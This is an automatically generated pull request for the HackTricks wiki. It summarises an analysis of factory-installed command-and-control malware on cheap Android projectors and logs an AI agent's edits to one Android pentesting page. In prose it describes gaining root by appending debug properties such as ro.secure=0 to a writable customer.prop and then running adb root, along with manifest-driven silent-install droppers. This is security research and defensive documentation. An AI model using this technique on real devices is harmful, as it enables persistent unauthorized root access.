Pre-installed C2 Infrastructure and RAT Payload on Android P...

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://github.com/Kavan00/Android-Projector-C2-Malware
• Blog Title: Pre-installed C2 Infrastructure and RAT Payload on Android Projectors
• Suggested Section: Mobile Pentesting -> Android Applications Pentesting (or a new page under Android: 'OEM/IoT Android Backdoors & Property Injection Root (customer.prop)') and optionally cross-link from Network Services Pentesting -> 5555 Android Debug Bridge (ADB) for the 'ADB over TCP unauth + adb root after property injection' angle

🎯 Content Summary

What this repo is
A technical security analysis (Apr 11–12, 2026) documenting a factory pre-installed command-and-control (C2) ecosystem on cheap Android projectors (supply-chain style; compared to “BADBOX”). The core finding is a preloaded “app store” system app that silently downloads/installs a hidden Remote Access Trojan (RAT), plus additional telemetry/ad modules, all with system-level privileges.

Affected devices / identification fingerprints
The analy...

🔧 Technical Details

Boot-time Android property injection to gain persistent root via ADB
If an Android device loads properties from an OEM-controlled file (e.g., /oem/customer.prop) at boot, and that partition is writable (e.g., FAT mounted with permissive masks such as fmask=0000) while SELinux is Permissive, an attacker can append properties like ro.debuggable=1, service.adb.root=1, and ro.secure=0, reboot, then use adb root to obtain uid=0. This converts a misconfiguration into a repeatable local/adjacent-network root backdoor (especially dangerous if ADB over TCP/5555 is exposed without auth).

Privileged “app store” system app as a dropper (manifest-driven silent install)
A preinstalled system app with INSTALL_PACKAGES can behave as a dropper by polling a vendor endpoint for a JSON manifest describing payload packages (pkg, encrypted pat...

🤖 Agent Actions

I’m mapping the repo first and locating existing Android/mobile pages that could absorb these techniques. Then I’ll read the closest matches and check for duplication before deciding whether any edit is justified.
The first pass shows a clear mobile-pentesting/android-app-pentesting area, plus likely overlap with ADB network-service content. I’m now reading Android and related pages directly to decide whether the new material belongs in an existing Android page or if the techniques are already covered elsewhere.
I’ve narrowed placement to the main Android pentesting page rather than creating a new file. That page already carries Android malware tradecraft and firmware/backdoor case studies, so I’m now validating the source material against existing HackTricks content to avoid adding duplicate or overly CVE-specific text.
The repo uses the release branch, not main, so I’m pulling the canonical README from there now. After that I’ll check exact insertion points in the Android page and patch only one file.
I’ve confirmed the content is additive and reusable rather than just a one-off malware report. I’m patching the Android main page now, keeping it concise: one new subsection for OEM Android system-app droppers and property-injection root backdoors, plus source links in the page’s existing references section.
Updated README.md in src/mobile-pentesting/android-app-pentesting/ as the best existing location. I did not create a new page because the reusable value here is Android malware tradecraft on OEM devices, not a device-specific CVE or product page.

The new content adds three technical patterns that were not already documented there: boot-time customer.prop property injection to turn exposed ADB into root, privileged system-app droppers driven by C2 manifests and pm install -r, and analyst workflow for C2-controlled anti-analysis using reverseLen byte reversal plus AES-CBC-hidden CDN paths. I also added the blog URL and the corroborating external analysis to the file’s ## References section at the end.

Verification: I re-read the modified section and checked the diff; the change is isolated to that single file and preserves the existing page structure.

---

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://github.com/Kavan00/Android-Projector-C2-Malware

Content Categories: Based on the analysis, this content was categorized under "Mobile Pentesting -> Android Applications Pentesting (or a new page under Android: 'OEM/IoT Android Backdoors & Property Injection Root (customer.prop)') and optionally cross-link from Network Services Pentesting -> 5555 Android Debug Bridge (ADB) for the 'ADB over TCP unauth + adb root after property injection' angle".

Repository Maintenance:

• MD Files Formatting: 972 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0